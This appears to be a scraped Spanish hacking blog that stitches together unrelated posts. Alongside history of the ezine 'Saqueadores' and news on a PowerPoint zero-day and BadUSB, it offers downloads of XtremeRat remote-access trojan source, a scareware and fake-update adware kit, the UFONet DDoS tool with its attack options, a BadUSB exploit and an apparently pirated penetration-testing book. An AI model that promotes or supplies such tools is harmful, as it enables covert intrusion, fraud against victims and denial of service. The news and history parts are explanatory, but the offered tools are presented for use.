El contenido eran básicamente textos técnicos de seguridad informática, programación, telecomunicaciones, fuesen traducciones, investigaciones propias y a veces copias de artículos de otras revistas, lo que era denostado por la comunidad 'hacker', que tiene en su jerga una palabra, 'lamer', para quien sólo copia sin aportar, adjudicándose y aprovechándose del trabajo de otros. En las primeras 'ezines' abundaban además los textos de talante destructivo o ilegal: cómo hacer bombas reales o virtuales, cómo abrir candados, beber gratis en una discoteca o robar dinero de un cajero automático. Y siempre había sitio para textos de humor.

Un ejemplo del contenido de una 'ezine hacker' ya más evolucionada sería este, del número 10 de 'Saqueadores Edición Técnica':






La 'ezine' 'Saqueadores' nació el 6 de octubre de 1996 y es la más longeva de la escena hacker hispana, con 38 números hasta la fecha, pues aunque lleva en letargo desde 2009 aún no ha echado oficialmente el cierre. Algunos la llaman la 'Phrack' española (la revista norteamericana 'Phrack' es la más respetada y longeva sobre hacking en lengua inglesa). No en vano pues llegó a tener gran influencia, no sólo la revista sino también las personas que congregó a su alrededor, artífices de buena parte de los proyectos de la escena 'hacker' de los 90 e instigadores del nacimiento y consolidación de la comunidad.

Empezó llamándose 'Saqueadores', después 'Saqueadores Edición Técnica' y finalmente se quedó en 'SET'. Inicialmente y como muchas otras 'ezines' se distribuía a través de una BBS, la BBS Club de Murcia. Los tres primeros números tenían un solo autor: Eljacker, a quien acompañaban Warezzman y Dark Raver. Pronto aparecieron más colaboradores, siendo los apodos más destacados El Duke de Sicilia, +Ochodedos, SLink, RoN, RedCool, Profesor Falken, Paseante, +NetBuL, Garrulon, Madfran, Green Legend, Rufus, Episiarca, Hendrix, FCA00000, Blackngel, Thenemi y Elotro.

Cuando la revista cumplió un año, en octubre de 1997, lo celebraron montando el primer congreso semi-público de 'hackers' del que se tiene noticia en España: la Undercon, un evento 'underground' al que sólo se accedía por invitación. La Undercon se celebró anualmente hasta 2004 y fue un importante catalizador de la comunidad hacker, que se reunía una vez al año en Murcia para escuchar charlas sobre temas tan punteros en plenos 90 como 'hacking' en satélites, o tan útiles como el pinchado de cabinas telefónicas.

El Profesor Falken y Paseante lideraron la revista en su momento de mayor esplendor, con impactantes artículos como cuando Paseante explica que se ha "paseado" por los servidores de Infovía (Archivo ZIP). La red Infovía de Telefónica era en los 90 el paso obligado de prácticamente todos los internautas para entrar a Internet. Decenas de proveedores de acceso nacieron a la sombra de Infovía, que permitía navegar, mandar correo o chatear a precio de llamada local. Paseante descubrió cómo tomar el control de esta red, lo que tuvo gran repercusión más allá del 'underground'. Los rumores aseguraban que Telefónica mandó gente a la Undercon para recabar más datos sobre esta intrusión.

Paseante explicó así su hazaña: "Me gustaria que quedase claro que debido a la situación española el control de Infovia posibilita el dominio cuasi-total del trafico Internet de nuestro país, eso no es solo un atractivo innegable para un 'hacker' sino también UNA RESPONSABILIDAD, no soy partidario de aquellos que en nombre de la 'libertad' se dedican a desestabilizar sistemas ya que en definitiva nos acaba perjudicando por la perdida de servicios y la 'leyenda negra' que se crea, ese es uno de los motivos por los que aquí damos pistas, indicios pero no todo masticado. El que quiera que se lo curre y por el camino confío que adquiera el sentido común necesario para ser capaz de no hundir sistemas de los que dependen centenares de miles de personas".

Una de las últimas acciones sonadas del grupo, que relata su 'ezine', se sitúa en noviembre de 1999, cuando entraron en el 'PacketShaper' de Telefónica, un sistema de control del tráfico de las redes de importantes empresas e instituciones españolas, comoAlcampo, Caja Madrid, El País, ABC, Instituto Cervantes, Telefónica, Banco Bilbao Vizcaya, Nestlé, Infonegocio, Agencia Estatal de Administración Tributaria, el Congreso de los Diputados, Iberia, Citroën y otros. Así contaba Paseante qué podrían haber hecho, pero por ética no hicieron:
Poner todo el trafico de Iberia a un _maximo_ de 1kb/s: Moraleja: Si va a volar con Iberia, vaya acostumbrandose a esperar.
Crear una nueva clase de trafico en Correo_Telefonica para todos los mensajes a Villalonga (tendra el correo ahi digo yo) y eliminarlos sin avisar :-O
Vigilar todo el trafico que genera el servidor del Congreso a ver si se esta haciendo buen uso de el Guipar todas las sesiones Telnet y FTP (da mucho juego)
Número 1: Aplicar un Redirect URL a la web de Telefonica.



¿Qué se esperaría de un 'piligroso delicuente hinfosmatico'?


Bloquear todo el trafico a El_Pais y el ABC
Resetear el PS, desconfigurarlo, cargar una nueva imagen del SO troyanizada.
Dejar a todos los usuarios de Teleline sin servicio.
Darle un Discard a Backbone_Salida, veras tu como nos reiamos.
Pegar un Never Admit masivo y cargarme tanto trafico que la quejas iban a llegar hasta la ONU.

"Lo podía haber hecho por supuesto, poner el shaping a on y crear una serie de politicas Never-Admit, Redirect URL, hacer un Discard salvaje... Podía haber hecho con el PS lo que quisiera, era completamente mío."
Fuente:elmundo.es

XtremeRat Limpio C#





Cita:
RAT’s: aplicaciones de administración remota .Tienen varias funciones como keylogger, capturador de cam, etc. Su función básica es administrar remotamente un ordenador desde otro y poder ejecutar distintas acciones que trae consigo.

Por esto esta Sucio :( 

http://www.rpp.com.pe/2014-01-27-piratas-informaticos-atacan-el-ministerio-de-defensa-de-israel-noticia_664887.html

http://www.v3.co.uk/v3-uk/news/2329614/hackers-dropping-zeus-in-favour-of-xtreme-rat

http://www.eset.com.uy/threat-center/index.php?subaction=showfull&id=1354747280&archive=&start_from=&ucat=2&n=2





Descargar Code:

http://www.mediafire.com/download/vzanwvc1zfwwf1x/CodesBy+hallaj.zip


Creditos Hallaj
Thanks F-I-G-H-T-E-R /Codes.

Exploit de Zero-day de Microsoft PowerPoint




Parece que no hay fin a las ventanas de cero días, como recientemente Microsoft parcheado tres vulnerabilidades de día cero en Windows, que fueron explotadas activamente en la naturaleza por los hackers, y ahora una nueva vulnerabilidad de día cero se ha revelado que afecta a todas las versiones compatibles del sistema operativo Windows, excepto en Windows Server 2003. 
Microsoft ha publicado una revisión de seguridad temporal para la falla y también confirmó que la falla de día cero está siendo activamente explotada por los hackers a través de ataques limitados y dirigidos que usan documentos maliciosos de PowerPoint de Microsoft enviados como adjuntos de correo electrónico. 
De acuerdo con el Aviso de seguridad de Microsoft publicado el martes, el día cero reside en el código del sistema operativo que se encarga de OLE (vinculación e incrustación) objetos. Tecnología OLE es más comúnmente utilizado por Microsoft Office para incrustar datos de, por ejemplo, una hoja de cálculo de Excel en un documento de Word.


La vulnerabilidad (designado como CVE-2014 a 6352) se activa cuando un usuario se ve obligado a abrir un archivos de PowerPoint que contiene un objeto malicioso vinculación e incrustación de objetos (OLE) objeto. Por ahora, sólo los archivos de PowerPoint son utilizados por los hackers para llevar a cabo los ataques, pero todos los tipos de archivo de Office también pueden ser utilizados para llevar a cabo mismo ataque. 
"La vulnerabilidad podría permitir la ejecución remota de código si un usuario abre un archivo de Microsoft Office especialmente diseñado que contiene un objeto OLE. Un atacante que aprovechara esta vulnerabilidad podría obtener los mismos derechos de usuario que el usuario actual", explicó el asesor. 
Ganando mismos derechos que un usuario conectado, un atacante podría infectar la computadora de la víctima mediante la instalación de otros programas maliciosos en ella. De acuerdo con el gigante del software, algunos ataques de Cuentas que el compromiso sin derechos de administrador pueden plantear un riesgo menor. 
Microsoft ha lanzado una revisión que el "OLE empaquetador Shim Solución" que detendrá los ataques de PowerPoint conocidos. Pero no es capaz de detener otros ataques que podrían ser construidos para aprovechar esta vulnerabilidad. También, la solución no está disponible para las ediciones de 64 bits de PowerPoint en las ediciones x64 de Windows 8 y Windows 8.1. 
Mientras tanto, Microsoft también instó a los usuarios de Windows a prestar atención al control de cuentas de usuario (UAC), alertado por un pop-up que requieren autorización antes de permitir que el sistema operativo para realizar diversas tareas, que advertir a un usuario una vez que el exploit empieza a disparar - pidiendo permiso para ejecutar. Pero, muchas veces los usuarios ven como un inconveniente y muchos habitualmente clic a través y sin pensarlo dos veces. 
"En los ataques observados, Control de cuentas de usuario (UAC) muestra una solicitud de consentimiento o una petición de elevación, dependiendo de los privilegios del usuario actual, antes de que un archivo que contiene el exploit se ejecuta," estados de asesoramiento de Microsoft. 
Además, Redmond no mencionó un parche fuera de banda para la vulnerabilidad de día cero, ni tampoco menciona si un parche estaría lista para actualización de noviembre de revisión de seguridad. 

A principios de este mes, Microsoft lanzó ocho boletines de seguridad, como parte de su actualización de parches mensuales, fijando tres fallas de día cero al mismo tiempo. Uno de los cuales (CVE-2014 a 4114) fue descubierto por los socios iSight en todas las versiones compatibles de Microsoft Windows y Windows Server 2008 y 2012 que estaba siendo explotada en el ataque cibernético "gusano de arena" para penetrar en redes grandes corporaciones.

Fuente:HackerNews

Adware


Nuevo modelo de update browser , auto detecta el navegador , funciona , google , ie , opera, firefox y safary
Modelo actualizado de flash player and scareware obama.
Remplasa el exe por tu exe / landing 0/60

¿Dónde aprendieron los 'hackers' a ser 'hackers'? (I)







No hay ser humano que no tenga un mínimo conocimiento. Pero en la comunidad 'hacker' el conocimiento es vital, materia prima, la sangre que corre por sus venas y razón de su existencia. En septiembre de 1997, la desaparecida revista 'Jumping' publicaba el que posiblemente sea primera reportaje sobre el fenómeno 'hacker' en España. Allí se destacaba, ya en las primeras líneas, esa búsqueda del Grial llamado conocimiento que es la base de la cultura 'hacker': "Los 'hackers', cuya máxima pretensión (en su estado puro) es conseguir toda la información posible para divulgarlaentre los demás usuarios (por lo menos en su reducido círculo de amigos). Hay que añadir que cuanto más grande sea el reto y más difícil sea conseguir esa información (independientemente del tipo o de la fuente) mayor será el aliciente para el 'hacker'".

Así era y así es. Una de las principales premisas éticas del 'hacker', desde los primeros grupos que aparecieron en los años 90 del siglo pasado, es la difusión de información sobre cómo funcionan las redes, los ordenadores y, en general, la tecnología. Hay que añadir aesa filosofía una necesidad: los hackers de los 80 y 90 eran autodidactas porque no había universidades que explicasen algo tan novedoso y, también, porque la gran mayoría huía de la universidad, prefería aprender por su cuenta. Así las cosas, este colectivo tuvo que hacer un esfuerzo tremendo para conseguir tan novedosa información, localizada fuera de España y mayoritariamente en inglés. Y, una vez conseguida, traducirla y difundirla por las BBS y primeras páginas web en Internet.

Hemos hablado en otras ocasiones, en este serie de artículos, sobre la importancia del 'hacking' del sistema telefónico ('phreaking') para conseguir que las conexiones a BBS extranjeras, para descargar la preciada información, costasen poco o nada a aquellos "cowboys del ciberespacio", como los llamó el escritor William Gibson. Convencidos de que la información debía circular por el mundo con la misma libertad con que circula por un ordenador, enfrascados en la replicación y traducción de un montón de textos de aprendizaje sobre redes e informática, muchos 'hackers' se convirtieron en maestros de unas asignaturas que no existían en la enseñanza reglada. De ahí apodos como el del 'hacker' gallego Lester The Teacher.

Pronto los más avezados escribirían sus propios textos, fruto de sus investigaciones, que publicaban en las BBS y webs de Internet,usualmente en forma de boletín llamado 'e-zine'. Junto a este esfuerzo de creación y traducción de textos destaca otro: la puesta en marcha de nodos que funcionaban como bibliotecas, recopilando esta información ('e-zines', documentos sueltos, programas, enlaces..), ordenándola por categorías y ofreciéndola en la web. Eran bases de datos públicas del conocimiento de la comunidad 'hacker', puertas de entrada para los novatos y no tan novatos.

Los primeros sitios web de 'hackers' españoles eran esto:recopilaciones de enlaces, en su gran mayoría de Estados Unidos. En agosto de 1996 nace Iberhack, uno de los primeros portales donde se ofrecen punteros a la incipiente cultura 'hacker' española: elSindicato de Hackers Españoles, Legion Oscura, Apostols, La Vieja Guardia, B.B.K.; el libro 'Llaneros solitarios' sobre 'hacking' en Latinoamérica, el 'Manual del Novicio al Hacking', primer texto sobre 'phreaking' escrito en castellano, por Ender Wiggins (Rampa); 'e-zines' como Minotauro, Saqueadores, Virtual Zone Magazine, The Young Hacker of Spain, Cyberhack; las pocas páginas que existían sobre cifrado, como 'Recursos de criptología en España'; los buscadores Olé, Telépolis y ¿Dónde?...

La mayoría de enlaces que contenía esta web, creada por Warezzman/Hackman y conservada gracias al proyecto Internet Archive, ya no funcionan, pero visitarla sirve para echar un vistazo a lo que era el pequeño mundo 'hacker' de los 90.

Underhack fue un esfuerzo parecido, en marcha desde al menos 1997, y Darkside, con un estilo diferente porque no ofrecía los datos ordenados en directorios sino empaquetados en el 'DarKSIdE Hacking Pack', al menos desde diciembre de 1996. Pero será La Taberna de Van Hackez quien gane la batalla de la popularidad de las bases de datos para 'hackers', con un sitio más profesional, con mayor volumen de enlaces, documentos y herramientas, y más adelante con foros. La Taberna nace en 1997, según se desprende de un artículo de la revista Saqueadores publicado el 25 de septiembre de 1997: "http:// vanhackez.islatortuga.com - La Cueva de Van Hackez - Van Hackez viene con ganas y su pagina es completa donde las haya, una cosa que esta muy bien es que la mayoría de programas, revistas, textos estan directamente en su Web y no dependen de links que normalmente ('Murphy rules') no funcionan. Como buena pagina esta siempre en construccion."

El fundador de La Taberna fue El Replicante, de quien se dice que era de Valencia. El sitio usaba publicidad pornográfica para financiarse y tenía claramente delimitadas dos secciones: la de 'hacking' y otra llamada 'La casa de madama Flop', con fotos porno. La sección de 'hacking' no cambió mucho en sus 7-8 años de existencia: ofrecía enlaces a 'crackeadores' de contraseñas, anonimizadores, 'mailbombers', escaneadores de puertos, 'exploits', troyanos, emuladores de tarjetas telefónicas, generadores de tonos, generadores de números de serie para 'crackear' programas, generadores de números de tarjetas de crédito, sitios donde tener correo o páginas web gratis, emuladores de juegos, 'scripts' de IRC y otras herramientas vitales para cualquier 'hacker' incipiente.

De especial interés histórico es la sección de textos, donde había documentación técnica en castellano como 'El Manual del Novicio al Hacking', traducciones al castellano donde destacaban 'IP-Spoofing desmitificado", de IPgh0st (Underhack), fechada en 1997. O 'La superguía del hacker', traducida por Nobody el 13 de enero de 1998. También 'Hackers: Rebeldes con causa' y 'Guía del hacking (mayormente) inofensivo' parte 1 y parte 2, traducciones del grupo B.B.K. (Big Bro Killerz). Había también textos jocosos, obligatorios en cualquier web de 'hacking' que se preciase, como 'A VÉ ¿QUÉ COÑO'SUN HACKER?', firmado por The Buscon of Astalavista, o'COMO SER UN "JAKER" EN 10 MINUTOS O EN 10 LECCIONES BREVES'. Era típico encontrar estos textos en la mayoría de BBS y recopilatorios de enlaces hacker en la web, siendo posiblemente el más extendido 'The Anarchist Cookbook'.

Pero La Taberna de Van Hackez nunca fue vista con buenos ojos por la totalidad de la comunidad 'hacker'. Además de financiarse con publicidad pornográfica, Replicante vendía CDS recopilatorios de herramientas y textos de 'hacking', los llamados 'TVHCD' (Taberna de Van Hackez CD). En noviembre de 1999 se puso a la venta el primero, con 650 MB de datos, al precio de 1.500 pesetas más gastos de envío. Al año siguiente apareció una segunda versión, que costaba 2.000 pesetas más gastos. La venta de estos CDs levantó ampollas, como podía leerse en es.comp.hackers, bajo el título 'Vanhackez, pirata entre los piratas':
Seldon: "Este tipo se dedica a vender unos cds por 2000 ptas. (¿los hará con gasolina, y por eso son tan caros?) con supuesto 'contenido propio', que en realidad son textos y tutoriales que han sido hechos de forma desinteresada, y puestos a disposición de todos los internautas de forma gratuita. Entre ellos, se encuentran varios textos salidos de las entrañas de estos grupos (es.comp.hackers y es.comp.cracks). Por supuesto, para incluir estos textos en su cd no ha pedido permiso a ninguno de sus autores (doy constancia de ello)".
Marmota: "...la mayoria de articulos son publicos, y esta muy bien que alguien los recopile y los publique...PERO JODER, QUE EL TIO COBRA 2000 CALAS POR ALGO QUE NO ES SUYO. Lo menos que podia hacer es pedir permiso a los autores, y especificar claramente de donde han salido las fuentes..."

El Replicante hizo oídos sordos a las críticas y siguió creando y vendiendo los TVH CDs, llegando a la cuarta entrega más una especial en 2002 y packs y DVDs recopilatorios de los mismos. Aproximadamente en 2004 Replicante vendió la web, el contenido y el dominio al canario LeChuck, que la siguió manteniendo hasta que, a finales de 2005, el sitio desapareció. El foro tenía entonces alrededor de 2.700 miembros. En los últimos meses de su existencia, hasta el 19 de febrero de 2005, cuando Internet Archive hace la última captura, sólo se podía acceder a la portada, donde había el siguiente texto: "'Lo que no me mata, me hace más fuerte'. Friedrich Nietzsche. Volveremos..."

Fuente:elmundo.es

Mastering kali linux for advanced penetration testing





Table of Contents
[ ii ]
Chapter 2: Identifying the Target – Passive Reconnaissance 43
Basic principles of reconnaissance 44
Open Source intelligence 45
DNS reconnaissance and route mapping 47
WHOIS 48
DNS reconnaissance 50
IPv4 51
IPv6 53
Mapping the route to the target 54
Obtaining user information 57
Gathering names and e-mail addresses 58
Profiling users for password lists 61
Summary 63
Chapter 3: Active Reconnaissance and Vulnerability Scanning 65
Stealth scanning strategies 66
Adjusting source IP stack and tool identification settings 66
Modifying packet parameters 68
Using proxies with anonymity networks (Tor and Privoxy) 69
Identifying the network infrastructure 73
Enumerating hosts 75
Live host discovery 75
Port, operating system, and service discovery 76
Port scanning 76
Fingerprinting the operating system 77
Determining active services 79
Employing comprehensive reconnaissance applications 80
nmap 81
The recon-ng framework 82
Maltego 85
Vulnerability scanning 88
Summary 89
Chapter 4: Exploit 91
Threat modeling 92
Using online and local vulnerability resources 93
The Metasploit Framework 98
Exploiting a vulnerable application 103
Exploiting multiple targets with Armitage 105
Team testing with Armitage 107
Scripting the Armitage attack 108
Bypassing IDs and antivirus detection 110
Summary 118
Table of Contents
[ iii ]
Chapter 5: Post Exploit – Action on the Objective 119
Bypassing Windows User Account Control 120
Conducting a rapid reconnaissance of a compromised system 122
Using the WMIC scripting language 125
Finding and taking sensitive data – pillaging the target 129
Creating additional accounts 133
Using Metasploit for post-exploit activities 134
Escalating user privileges on a compromised host 139
Replaying authentication tokens using incognito 140
Manipulating access credentials with Windows Credential Editor 142
Escalating from Administrator to SYSTEM 143
Accessing new accounts with horizontal escalation 143
Covering your tracks 144
Summary 147
Chapter 6: Post Exploit – Persistence 149
Compromising the existing system and application files
for remote access 150
Remotely enabling the Telnet service 150
Remotely enabling Windows Terminal Services 152
Remotely enabling Virtual Network Computing 154
Using persistent agents 155
Employing Netcat as a persistent agent 155
Maintaining persistence with the Metasploit Framework 159
Using the metsvc script 159
Using the persistence script 161
Creating a standalone persistent agent with Metasploit 163
Redirecting ports to bypass network controls 165
Example 1 – simple port redirection 166
Example 2 – bidirectional port redirection 167
Summary 168
Part 2: The Delivery Phase
Chapter 7: Physical Attacks and Social Engineering 171
Social Engineering Toolkit 172
Spear Phishing Attack 176
Using a website attack vector – Java Applet Attack Method 181
Using a website attack vector – Credential Harvester Attack Method 186
Using a website attack vector – Tabnabbing Attack Method 188
Using a website attack vector - Multi-Attack Web Method 190
Table of Contents
[ iv ]
Using the PowerShell alphanumeric shellcode injection attack 190
Hiding executables and obfuscating the attacker's URL 192
Escalating an attack using DNS redirection 194
Physical access and hostile devices 197
Raspberry Pi attack vectors 200
Summary 202
Chapter 8: Exploiting Wireless Communications 203
Configuring Kali for wireless attacks 204
Wireless reconnaissance 204
Kismet 207
Bypassing a Hidden Service Set Identifier 209
Bypassing the MAC address authentication 211
Compromising a WEP encryption 213
Attacking WPA and WPA2 219
Brute-force attacks 219
Attacking wireless routers with Reaver 223
Cloning an access point 224
Denial-of-service attacks 225
Summary 227
Chapter 9: Reconnaissance and Exploitation
of Web-based Applications 229
Conducting reconnaissance of websites 230
Vulnerability scanners 236
Extending the functionality of traditional vulnerability scanners 237
Extending the functionality of web browsers 238
Web-service-specific vulnerability scanners 240
Testing security with client-side proxies 243
Server exploits 250
Application-specific attacks 251
Brute-forcing access credentials 251
Injection attacks against databases 252
Maintaining access with web backdoors 254
Summary 256
Chapter 10: Exploiting Remote Access Communications 257
Exploiting operating system communication protocols 258
Compromising Remote Desktop Protocol 258
Compromising Secure Shell 262
Exploiting third-party remote access applications 264
Table of Contents
[ v ]
Attacking Secure Sockets Layer 266
Configuring Kali for SSLv2 scanning 267
Reconnaissance of SSL connections 269
Using sslstrip to conduct a man-in-the-middle attack 275
Denial-of-service attacks against SSL 277
Attacking an IPSec Virtual Private Network 278
Scanning for VPN gateways 279
Fingerprinting the VPN gateway 280
Capturing pre-shared keys 282
Performing offline PSK cracking 282
Identifying default user accounts 283
Summary 283
Chapter 11: Client-side Exploitation 285
Attacking a system using hostile scripts 286
Conducting attacks using VBScript 286
Attacking systems using Windows PowerShell 289
The Cross-Site Scripting Framework 291
The Brower Exploitation Framework – BeEF 299
Installing and configuring the Browser Exploitation Framework 300
A walkthrough of the BeEF browser 303
Integrating BeEF and Metasploit attacks 308
Using BeEF as a tunneling proxy 309
Summary 311
Appendix: Installing Kali Linux 313
Downloading Kali Linux 313
Basic Installation of Kali Linux 314
Installing Kali Linux to a virtual machine 315
Full disk encryption and nuking the master key 316
Setting up a test environment 321
Vulnerable operating systems and applications 322
Index 327

Descargar:

http://www.mediafire.com/download/kos3w3g10wr2amn/Mastering+kali.rar


UFONet - DDoS



UFONet - es una herramienta diseñada para lanzar ataques DDoS contra un objetivo, utilizando vectores 'Open Redirect' de aplicaciones web de terceros, como botnet.

Intrucciones:

http://ufonet.sourceforge.net/

número de versión del programa de espectáculos --version y salida 
   v, --verbose verbose activa en las peticiones 
   --check-tor de verificación para ver si Tor se utiliza correctamente 
   cheque --update para la última versión estable 

   * Configure Request (s) *: 
     --proxy = PROXY Usar servidor proxy (tor: http: // localhost: 8118) 
     --user-agente = AGENTE Utilice otro encabezado HTTP User-Agent (por defecto falsificada) 
     --referer = REFERER Utilice otro encabezado HTTP de Referer (default falsificada) 
     --host = HOST Utilice otro encabezado HTTP Host (NINGUNO por defecto) 
     --xforw Establezca su HTTP X-Forwarded-Porque con los valores IP aleatorias 
     --xclient Establezca su HTTP X-Client-IP con los valores IP aleatorias 
     --timeout = TIMEOUT Seleccione el tiempo de espera (por defecto 30) 
     --retries = reintentos reintentos cuando los tiempos de espera de conexión (por defecto 1) 
     --delay = RETRASO Retraso en segundos entre cada solicitud HTTP (por defecto 0) 

   * Gestionar Botnet *: 
     -s Buscar Buscar 'zombies' en google (ex: '? proxy.php url =' -s) 
     --sn = NUM_RESULTS Establecer número máximo de resultado a buscar (por defecto 10) 
     -t lista de prueba TEST de los servidores web de los zombies "(ex: zombies.txt t) 

   * Configurar Ataque (s) *: 
     -r RONDAS Establecer número de 'rondas' para el ataque (por defecto: 1) 
     LUGAR -b Establezca un lugar para 'poco' en el blanco (ex: /path/big.jpg -b) 

     OBJETIVO: una Inicie un ataque DDoS Web (ex: -a http (s): //target.com)

Testeado en Kali linux.

Descargar:

http://www.mediafire.com/download/u4f4v6t62tm6bcr/2.ufonet-0.3.1b.rar


BADusb Exploit Liberado



 ¿Qué es BAD USB ? 

Badusb es creado por ingeniería inversa del dispositivo USB 
y mediante la inserción de programas maliciosos en el firmware, por lo que cuando se utiliza un palo infectado su mal estado. Sus puertos USB se hackeado y también lo hará el teclado y el ratón. Algunos técnicos llaman a esto 'exploit del año'. 

Este era privada y sólo se filtró en estos días. 
pero todavía 0 días y FUD 
Por favor, use con responsabilidad. 
usted encontrará todas las instrucciones en la página de descarga.






https://github.com/adamcaudill/Psychson


Exploit:

http://www.mediafire.com/download/7xcml97qz8aqx84/1Psychson-master.rar


Liberan el hack para infectar USB de manera indetectable







El malware aprovecha un error de hardware que no puede ser parchado

A finales de julio, los expertos en seguridad digital de SR Labs, Karsten Nohl y Jakob Lell, revelaron el descubrimiento de BadUSB, un defecto de diseño en el hardware de los dispositivos USB que permiten infectarlos con malware de manera indetectable. Los especialistas se negaron a publicar el código de su hallazgo por la imposibilidad de crear un parche, pero los investigadores independientes Adam Caudill y Brandon Wilson utilizaron ingeniería inversa para repetir los efectos de BadUSB y publicarlos en GitHub.

La semana pasada, durante la conferencia Derbycon en Louisville, Kentucky, Caudill explicó la razón para publicar el código que podría afectar a cientos de millones de usuarios:


Esto fue inspirado en gran parte por el hecho de que SR Labs no publicó su material. Si vas a probar que hay una falla, necesitas liberar el material para que las personas puedan defenderse de ella. (…) Si esto se va a solucionar, necesita ser con más que sólo una plática en Black Hat.

Ambos investigadores concuerdan en que publicar el exploit es la única manera para presionar a los fabricantes de USB a cambiar el esquema de seguridad de estos dispositivos. Además, de esta forma, los consultores de seguridad informática podrán demostrar a sus clientes que las USB son casi imposibles de proteger en su estado actual.

BadUSB explota el firmware del USB para que este pueda hacerse pasar por un dispositivo que no sea revisado por un antivirus, tal como un teclado o un ratón. Una vez conectado a una computadora, el USB puede ejecutar tecleadas configuradas por el atacante, otorgándole el control del ordenador. “La gente ve [los USB] y los considera como nada más que un dispositivo de almacenamiento. No se dan cuenta de que tienen una computadora reprogramable en sus manos”, dijo Caudill.

En septiembre, la firma de seguridad G Data lanzó un programa que niega el acceso a un teclado cuando se conecta, dando oportunidad al usuario de verificar si el dispositivo que conectó a través del puerto USB es genuinamente un teclado o si se trata de una USB infectada. Por otra parte, esta es una solución incompleta y que puede ser burlada.

A pesar de todo, BadUSB no es lo peor que le puede pasar a las USB. Caudill y Wilson están trabajando en otro hack invisible que inyectaría malware a los archivos de una USB al momento de ser copiados a una computadora. A partir de ese momento, cualquier USB que se conecte a la computadora infectada contraería el mismo código malicioso, convirtiendo al exploit en una posible epidemia.

Dado el peligroso impacto que podría tener este último descubrimiento, los investigadores aún debaten el publicar el código, pues ambos están conscientes de que se encuentran en un dilema ético. “Hay un equilibrio difícil entre probar que esto es posible y hacer que sea fácil que las personas lo hagan. Queremos asegurarnos de que estamos en el lado correcto.”

A pesar de estos descubrimientos, siempre se ha recomendado como una práctica segura el no utilizar dispositivos USB cuya procedencia sea desconocida o poco confiable, y esta precaución no perderá vigencia.


El Tema Continua en BADusb Exploit Liberado

Fuente:FayerWayer